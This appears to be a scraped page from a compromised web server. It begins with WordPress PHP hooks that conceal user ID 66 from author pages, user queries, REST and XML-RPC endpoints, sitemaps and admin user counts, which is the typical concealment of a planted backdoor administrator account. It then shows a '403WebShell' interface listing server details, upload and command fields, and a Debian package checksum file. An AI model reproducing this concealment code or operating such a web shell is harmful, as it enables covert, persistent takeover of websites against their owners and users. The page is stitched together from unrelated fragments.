add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/ncurses-base.md5sums
4bdf342194c8b3dcf47416c4d8aa6fe9  usr/share/doc/ncurses-base/FAQ
7493372c830eef9ed0a64ae64131d144  usr/share/doc/ncurses-base/TODO.Debian
e32b14bb6ec2151a0b64137757ecd063  usr/share/doc/ncurses-base/changelog.Debian.gz
36b4f748fe84bf613a10acb29ac390f3  usr/share/doc/ncurses-base/copyright
db7bf6a0d2bf646ff52f5808247e772f  usr/share/lintian/overrides/ncurses-base
0633f2811ab9958deef70a4ceb124d2e  usr/share/tabset/std
75738443f4560dabbbb5781a43b6076f  usr/share/tabset/stdcrt
932387cdf8429aba6dd9c6567022829a  usr/share/tabset/vt100
fd329c87dc8cfd0191c9e9b4c891460b  usr/share/tabset/vt300
0cf656c105ff2a636e1268608731ebe9  usr/share/terminfo/E/Eterm
1e43e61b0e4fba70d63b5b6d3dce2a7c  usr/share/terminfo/a/ansi
a446b9abe10d999c3f65c4e1aa079059  usr/share/terminfo/c/cons25
962c85df3fb97b9555d271163e584f41  usr/share/terminfo/c/cygwin
ca3b114f0727da81a9b957b553a9915d  usr/share/terminfo/d/dumb
f0c8478195a775ff6a9aa29b7f808c4d  usr/share/terminfo/h/hurd
46ba8283b9049e9264cfd368550d140f  usr/share/terminfo/l/linux
4525a57ea8297db1778cb72f4a19e0c2  usr/share/terminfo/m/mach
bd0ca1baff8aa9034a68b00b3bc090c6  usr/share/terminfo/m/mach-bold
24f1e2e6793e274ac3f064fc83a05468  usr/share/terminfo/m/mach-color
141f1b49cc1f3f1912f0e18076bb2c28  usr/share/terminfo/m/mach-gnu
b0b60c7e9793275c4458348ec4343606  usr/share/terminfo/m/mach-gnu-color
a1a451f1c2570b4b8919ed8ea9282792  usr/share/terminfo/p/pcansi
663527af7703d6c2571b9e34b4acbc58  usr/share/terminfo/r/rxvt
52ef40b904e9f59175c49a0da6497b1b  usr/share/terminfo/r/rxvt-basic
a68ebfd0af7e34f2898c9835987ccdfc  usr/share/terminfo/r/rxvt-unicode
6aaf94b35deb8e03970a346abec0cbf8  usr/share/terminfo/r/rxvt-unicode-256color
26782aef2c68a519d71cd09df4f38d68  usr/share/terminfo/s/screen
eaffe585178ec5b5639e9034df19190f  usr/share/terminfo/s/screen-256color
6c1bdac70c3d495031a6a1c6069b3d27  usr/share/terminfo/s/screen-256color-bce
8996119356f59a6c2b4ef3358e3889c1  usr/share/terminfo/s/screen-bce
19f7c53d7125ed46f180fbb62cbb6a03  usr/share/terminfo/s/screen-s
e23dca32cb0eff51ae99f435a004a251  usr/share/terminfo/s/screen-w
4df89d41a92421d4987dab6c0c1b4c01  usr/share/terminfo/s/screen.xterm-256color
430390b5b3a52aef2cf94d6f7a6aa000  usr/share/terminfo/s/sun
e124729bd53b1f19d4397af194e73972  usr/share/terminfo/t/tmux
b0fa5f15aa2a52d20ccf8feacc9721ea  usr/share/terminfo/t/tmux-256color
df9446f7fd9c4fdb33d411ae92710c27  usr/share/terminfo/v/vt100
3083e2d71619d482b4b6abbb005c0355  usr/share/terminfo/v/vt102
e0fe59d705ba2adc5d930dfeb0a489ba  usr/share/terminfo/v/vt220
cead4a9d4527b35b3fe8860bcbbbd19b  usr/share/terminfo/v/vt52
fbb970323e77c4200ae32bb2d5de06cc  usr/share/terminfo/w/wsvt25
06d6cf8d37220d1ac4bcf80460cff50e  usr/share/terminfo/w/wsvt25m
eff94965b0d8319a4aafd026b33c6619  usr/share/terminfo/x/xterm
a24beb2b2b33a51832baab8566402f24  usr/share/terminfo/x/xterm-256color
60cf779afa539204a8fae90e07f57689  usr/share/terminfo/x/xterm-color
d62887921329328900a50dbddf32e184  usr/share/terminfo/x/xterm-mono
ddc200c30ecff55f71dd3c19d5375006  usr/share/terminfo/x/xterm-r5
8b88ffea0ba02455c2467d730ca57407  usr/share/terminfo/x/xterm-r6
47168e61cf9efbad94efefe7e950dca8  usr/share/terminfo/x/xterm-vt220
94d6414f04d7208738e9d1815d321992  usr/share/terminfo/x/xterm-xfree86

Youez - 2016 - github.com/yon3zu
LinuXploit